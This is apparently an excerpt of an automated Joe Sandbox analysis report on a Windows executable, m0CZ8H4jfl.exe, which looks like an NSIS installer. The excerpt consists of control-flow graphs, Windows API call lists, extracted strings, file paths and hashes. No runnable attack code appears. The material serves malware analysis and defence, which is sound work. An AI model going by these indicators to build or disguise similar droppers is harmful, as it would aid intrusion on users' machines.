                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                          • API String ID: 900638850-1230650788
                                                                                                          • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                          • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                          • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                          • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 562 405846-40586c call 405b11 565 405885-40588c 562->565 566 40586e-405880 DeleteFileW 562->566 568 40588e-405890 565->568 569 40589f-4058af call 406055 565->569 567 405a02-405a06 566->567 570 4059b0-4059b5 568->570 571 405896-405899 568->571 575 4058b1-4058bc lstrcatW 569->575 576 4058be-4058bf call 405a55 569->576 570->567 574 4059b7-4059ba 570->574 571->569 571->570 577 4059c4-4059cc call 406398 574->577 578 4059bc-4059c2 574->578 579 4058c4-4058c8 575->579 576->579 577->567 586 4059ce-4059e2 call 405a09 call 4057fe 577->586 578->567 582 4058d4-4058da lstrcatW 579->582 583 4058ca-4058d2 579->583 585 4058df-4058fb lstrlenW FindFirstFileW 582->585 583->582 583->585 587 405901-405909 585->587 588 4059a5-4059a9 585->588 602 4059e4-4059e7 586->602 603 4059fa-4059fd call 4051b4 586->603 592 405929-40593d call 406055 587->592 593 40590b-405913 587->593 588->570 591 4059ab 588->591 591->570 604 405954-40595f call 4057fe 592->604 605 40593f-405947 592->605 596 405915-40591d 593->596 597 405988-405998 FindNextFileW 593->597 596->592 598 40591f-405927 596->598 597->587 601 40599e-40599f FindClose 597->601 598->592 598->597 601->588 602->578 606 4059e9-4059f8 call 4051b4 call 405ef6 602->606 603->567 615 405980-405983 call 4051b4 604->615 616 405961-405964 604->616 605->597 607 405949-405952 call 405846 605->607 606->567 607->597 615->597 619 405966-405976 call 4051b4 call 405ef6 616->619 620 405978-40597e 616->620 619->597 620->597
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNELBASE(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\m0CZ8H4jfl.exe"), ref: 0040586F
                                                                                                          • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\m0CZ8H4jfl.exe"), ref: 004058B7
                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\m0CZ8H4jfl.exe"), ref: 004058DA
                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\m0CZ8H4jfl.exe"), ref: 004058E0
                                                                                                          • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\m0CZ8H4jfl.exe"), ref: 004058F0
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                          • \*.*, xrefs: 004058B1
                                                                                                          • "C:\Users\user\Desktop\m0CZ8H4jfl.exe", xrefs: 0040584F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                          • String ID: "C:\Users\user\Desktop\m0CZ8H4jfl.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                          • API String ID: 2035342205-3068672937
                                                                                                          • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                          • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                          • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                          • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                          APIs
                                                                                                          • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402114
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00402154
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInstance
                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving
                                                                                                          • API String ID: 542301482-4023340444
                                                                                                          • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                          • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                                                                                          • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                          • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNELBASE(76F93420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                          • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 2295610775-0
                                                                                                          • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                          • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                                                                                          • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                          • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFindFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 1974802433-0
                                                                                                          • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                          • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                                                                                          • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                          • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 379 40395e-403986 call 405f22 377->379 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 379->378 386 403988-40398c 379->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 390 40399e-4039aa lstrlenW 386->390 391 40398e-40399b call 405a36 386->391 400 403aa5-403aa8 388->400 401 403aad-403ab8 call 403b74 388->401 392 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->392 393 403b6a 389->393 397 4039d2-4039da call 405a09 call 406055 390->397 398 4039ac-4039ba lstrcmpiW 390->398 391->390 392->388 396 403b6c-403b73 393->396 397->378 398->397 404 4039bc-4039c6 GetFileAttributesW 398->404 400->396 412 403b41-403b49 call 405287 401->412 413 403abe-403ad8 ShowWindow call 4063bf 401->413 407 4039c8-4039ca 404->407 408 4039cc-4039cd call 405a55 404->408 407->397 407->408 408->397 418 403b63-403b65 call 40140b 412->418 419 403b4b-403b51 412->419 420 403ae4-403af6 GetClassInfoW 413->420 421 403ada-403adf call 4063bf 413->421 418->393 419->400 422 403b57-403b5e call 40140b 419->422 425 403af8-403b08 GetClassInfoW RegisterClassW 420->425 426 403b0e-403b31 DialogBoxParamW call 40140b 420->426 421->420 422->400 425->426 430 403b36-403b3f call 4037ee 426->430 430->396
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                            • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                          • GetUserDefaultUILanguage.KERNELBASE(00000002,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\m0CZ8H4jfl.exe"), ref: 004038B8
                                                                                                            • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                          • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\m0CZ8H4jfl.exe"), ref: 0040391F
                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F93420), ref: 0040399F
                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                          • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403A5B
                                                                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                          • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: "C:\Users\user\Desktop\m0CZ8H4jfl.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                          • API String ID: 606308-1519589771
                                                                                                          • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                          • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                          • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                          • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 438 403020-403024 437->438 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 447 402e81-402e98 446->447 450 402e9a 447->450 451 402e9c-402ea5 call 403242 447->451 450->451 459 402eab-402eb2 451->459 460 402fcd-402fd5 call 402d8a 451->460 455 402f78-402f90 call 403258 call 403242 452->455 456 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->456 453->438 455->453 479 402f92-402f98 455->479 456->453 484 402fd7-402fe8 456->484 463 402eb4-402ec8 call 405be5 459->463 464 402f2e-402f32 459->464 460->453 470 402f3c-402f42 463->470 482 402eca-402ed1 463->482 469 402f34-402f3b call 402d8a 464->469 464->470 469->470 475 402f51-402f5b 470->475 476 402f44-402f4e call 4064dc 470->476 475->447 483 402f61 475->483 476->475 479->453 479->456 482->470 488 402ed3-402eda 482->488 483->445 485 402ff0-402ff5 484->485 486 402fea 484->486 489 402ff6-402ffc 485->489 486->485 488->470 490 402edc-402ee3 488->490 489->489 491 402ffe-403019 SetFilePointer call 405be5 489->491 490->470 492 402ee5-402eec 490->492 496 40301e 491->496 492->470 494 402eee-402f0e 492->494 494->453 495 402f14-402f18 494->495 497 402f20-402f28 495->497 498 402f1a-402f1e 495->498 496->438 497->470 499 402f2a-402f2c 497->499 498->483 498->497 499->470
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\m0CZ8H4jfl.exe,?,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                            • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\m0CZ8H4jfl.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                            • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\m0CZ8H4jfl.exe,C:\Users\user\Desktop\m0CZ8H4jfl.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                          • String ID: "C:\Users\user\Desktop\m0CZ8H4jfl.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\m0CZ8H4jfl.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                          • API String ID: 4283519449-1736084589
                                                                                                          • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                          • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                          • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                          • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 626 401767-40178c call 402bbf call 405a80 631 401796-4017a8 call 406055 call 405a09 lstrcatW 626->631 632 40178e-401794 call 406055 626->632 637 4017ad-4017ae call 4062e9 631->637 632->637 641 4017b3-4017b7 637->641 642 4017b9-4017c3 call 406398 641->642 643 4017ea-4017ed 641->643 651 4017d5-4017e7 642->651 652 4017c5-4017d3 CompareFileTime 642->652 645 4017f5-401811 call 405c2a 643->645 646 4017ef-4017f0 call 405c05 643->646 653 401813-401816 645->653 654 401885-4018ae call 4051b4 call 403027 645->654 646->645 651->643 652->651 655 401867-401871 call 4051b4 653->655 656 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 653->656 668 4018b0-4018b4 654->668 669 4018b6-4018c2 SetFileTime 654->669 666 40187a-401880 655->666 656->641 688 40185c-40185d 656->688 670 402a55 666->670 668->669 672 4018c8-4018d3 CloseHandle 668->672 669->672 675 402a57-402a5b 670->675 673 4018d9-4018dc 672->673 674 402a4c-402a4f 672->674 677 4018f1-4018f4 call 406077 673->677 678 4018de-4018ef call 406077 lstrcatW 673->678 674->670 684 4018f9-40228d call 40579a 677->684 678->684 684->675 688->666 690 40185f-401860 688->690 690->655
                                                                                                          APIs
                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,?,00000031), ref: 004017A8
                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,?,00000031), ref: 004017CD
                                                                                                            • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,?,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,76F923A0), ref: 0040520F
                                                                                                            • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp$C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp\System.dll$Call
                                                                                                          • API String ID: 1941528284-3268258928
                                                                                                          • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                          • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                          • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                          • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
